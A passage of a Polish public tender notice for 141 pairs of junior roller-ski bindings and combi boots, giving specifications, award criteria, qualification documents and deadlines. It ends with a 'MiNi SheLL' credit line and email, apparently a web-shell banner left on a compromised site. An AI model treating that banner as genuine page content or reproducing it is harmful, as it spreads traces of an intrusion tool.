rozwiązań równoważnych. Materiały lub urządzenia pochodzące od konkretnego producenta określają minimalne parametry jakościowe i cechy użytkowe jakim muszą odpowiadać materiały lub urządzenia proponowane przez Wykonawcę aby zostały spełnione wymagania stawiane przez Zamawiającego i stanowią jedynie wzorzec, przykład jakościowy przedmiotu zamówienia a to oznacza, że Wykonawcy przysługuje prawo ich zastąpienia przez materiały, o co najmniej równoważnych parametrach technicznych pod warunkiem osiągnięcia założonych standardów technicznych. Wykonawca proponujący materiały zamienne odpowiedzialny jest za sprawdzenie możliwości ich zastosowania w realizacji przedmiotu zamówienia pod każdym względem (w tym np. właściwości, wymiarów).<br/><br/>Zainstalowane wiązania juniorskie biegowe manualne w normie NNN/PLK i stopniu twardości flexora 100, posiadające błotniki. <br/><br/>ILOŚĆ - 141 par (rozmiar 33-44 EU)<br/><br/>ORIENTACYJNA LOKALIZACJA OZNAKOWANIA MSIT: bok nartorolki, z przodu (przy kole).<br/><br/>b)	Buty do nartorolek.<br/><br/>Ciepły, łatwy w obsłudze but typu combi junior (skiathlon) przeznaczony do jazdy techniką łyżwową i klasyczną. Zewnętrzny górny mankiet z wolnym zawiasem przegubowym, zapewniający ścisłe dopasowanie do stopy stawu skokowego w celu utrzymania go w prawidłowym ustawieniu <br/>i umożliwiający zapewnienie ciepła i komfortu jazdy na nartorolkach i nartach.<br/>System łatwego sznurowania buta ma zapewnić młodym narciarzom sprawne zakładanie oraz ściąganie butów a konstrukcja umożliwia do prowadzenia treningu zarówno techniką łyżwową jak i klasyczną.<br/>ILOŚĆ - 141 par (w tym: nr 33 x 1 para; nr 34 x 3 pary; nr 35 x 5 par; nr 35,5 x 2 pary; <br/>nr 36 x 6 par; nr 36 2/3 x 15 par; nr 37 1/3 x 12 par; nr 38 x 14 par; nr 38 2/3 x 14 par; <br/>nr 39 1/3 x 19 par; nr 40 x 12 par; nr 40 2/3 x 11 par; nr 41 1/3 x 13 par; nr 42 x 14 par).<br/><br/>Uwaga: Dopuszcza się rozmiary butów biegowych w ogłoszonych rozmiarach plus 1/3 lub 2/3 <br/>w rozmiarach EU.<br/><br/>ORIENTACYJNA LOKALIZACJA OZNAKOWANIA MSIT: przód buta (na zapięciu). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 124951,22 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37410000-5 - Sprzęt sportowy do uprawiania sportów na wolnym powietrzu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został szczegółowo opisany w pkt 17. SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Ubiegając się o udzielenie zamówienia publicznego, Wykonawca jest zobowiązany do wypełnienia wszystkich obowiązków<br/>formalno-prawnych związanych z udziałem w postępowaniu.<br/>W postępowaniu mogą wziąć udział Wykonawcy, którzy:<br/>- nie podlegają wykluczeniu z postępowania na podstawie przepisów, o których mowa w pkt.15 SWZ;<br/>- spełniają warunki udziału w postępowaniu.<br/>Ocena spełniania przez Wykonawców warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty<br/>wymienione w punkcie 9.1.e) (jeżeli dotyczy) oraz 9.1.g) SWZ a warunków, dotyczących niepodlegania wykluczeniu z<br/>postępowania - w oparciu o dokumenty wymienione w pkt 9.1.f) SWZ oraz pkt 9.2. SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.1.e) SWZ: jeżeli dotyczy - ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY DO ODDANIA W DYSPOZYCJĘ<br/>WYKONAWCY NIEZBĘDNYCH ZASOBÓW na potrzeby realizacji zamówienia <br/>9.1.g) SWZ: OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1.f)SWZ: OŚWIADCZENIE O NIEPODLEGANIU WYKLUCZENIU Z POSTĘPOWANIA.<br/>9.2. SWZ: Oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu z postępowania (pkt 9.1.f) SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w pkt 15 SWZ wg wzorów zawartych w formularzach załączonych do SWZ, dotyczące:<br/>– Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>– podmiotu lub podmiotów, na których zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu (jeżeli dotyczy)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> NIE DOTYCZY <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Załącznik nr 1 do SWZ: „FORMULARZ OFERTOWY” (udostępniony na Platformie e-Zamówienia).<br/>1.1. Załącznik nr 1 do Formularza Ofertowego: „ZAKRES FINANSOWO - RZECZOWY”.<br/>1.2. Załącznik nr 2 do Formularza Ofertowego: „OŚWIADCZENIE DOTYCZĄCE LICZBY POJAZDÓW SAMOCHODOWYCH UŻYWANYCH PRZY WYKONYWANIU ZAMÓWIENIA”.<br/>2. Dokumenty potwierdzające, że osoba działająca w imieniu Wykonawcy jest upoważniona do jego reprezentowania, tj:<br/>– ODPIS LUB INFORMACJA Z KRAJOWEGO REJESTRU SĄDOWEGO, CENTRALNEJ EWIDENCJI I INFORMACJI O<br/>DZIAŁALNOŚCI GOSPODARCZEJ LUB INNEGO WŁAŚCIWEGO REJESTRU, chyba że Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych;<br/>– PEŁNOMOCNICTWO LUB INNY DOKUMENT potwierdzający upoważnienie do reprezentowania Wykonawcy, jeżeli w jego imieniu działa osoba, której upoważnienie do reprezentowania nie wynika z dokumentów, wymienionych w poprzednim punkcie.<br/>Powyższe zasady dotyczą odpowiednio osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oraz osoby działającej w imieniu podmiotu udostępniającego zasoby.<br/>3. Załącznik nr 4 do SWZ: &#34;OŚWIADCZENIE WYKONAWCY W ZAKRESIE WYPEŁNIENIA OBOWIĄZKÓW INFORMACYJNYCH PRZEWIDZIANYCH W ART. 13 LUB ART. 14 RODO&#34; - w celu wypełnienia obowiązków w zakresie przetwarzania danych osobowych zgodnie z RODO, o których mowa w pkt 24 SWZ – dotyczy Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacje na temat Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 58 ust. 1 ustawy,<br/>zostały szczegółowo opisane w pkt 9.3. SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zostały określone we wzorze umowy, który stanowi załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-30 17:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">PLATFORMA e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-30 18:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 90 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> a) Zamawiający nie wymaga zatrudnienia osób na podstawie stosunku pracy.<br/>b) Zamawiający nie wymaga zatrudnienia osób o których mowa w art. 96 ust. 2 pkt 2.<br/>c) Określając warunki i kryteria w niniejszym postępowaniu, Zamawiający nie eliminuje ani nie ogranicza w ubieganiu się o<br/>udzielenie zamówienia kręgu Małych i Średnich Przedsiębiorstw.<br/>d) Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>e) Zamawiający nie przewiduje możliwości udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 8 Pzp.<br/>f) Zamawiający przed wszczęciem postępowania nie przeprowadził wstępnych konsultacji rynkowych.<br/>g) Zamawiający nie przewiduje przeprowadzenia przez wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust. 2 Pzp.<br/>h) Zamawiający nie przewiduje rozliczeń w walutach obcych. Rozliczenia pomiędzy Zamawiającym a Wykonawcą prowadzone będą w polskich złotych (PLN).<br/>i) Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych zadań zgodnie z art. 60 i art.<br/>121 Pzp.<br/>j) Na podstawie art. 462 – 463 Pzp, Zamawiający dopuszcza możliwość realizacji przedmiotu zamówienia przez Wykonawcę z wykorzystaniem podwykonawców. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, wskazuje w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podaje nazwy ewentualnych podwykonawców, jeżeli są już znani.<br/>k) Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne w zakresie opisywanym przez<br/>Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.<br/>l) Zamawiający nie przewiduje zawarcia umowy ramowej.

Creat By MiNi SheLL
Email: jattceo@gmail.com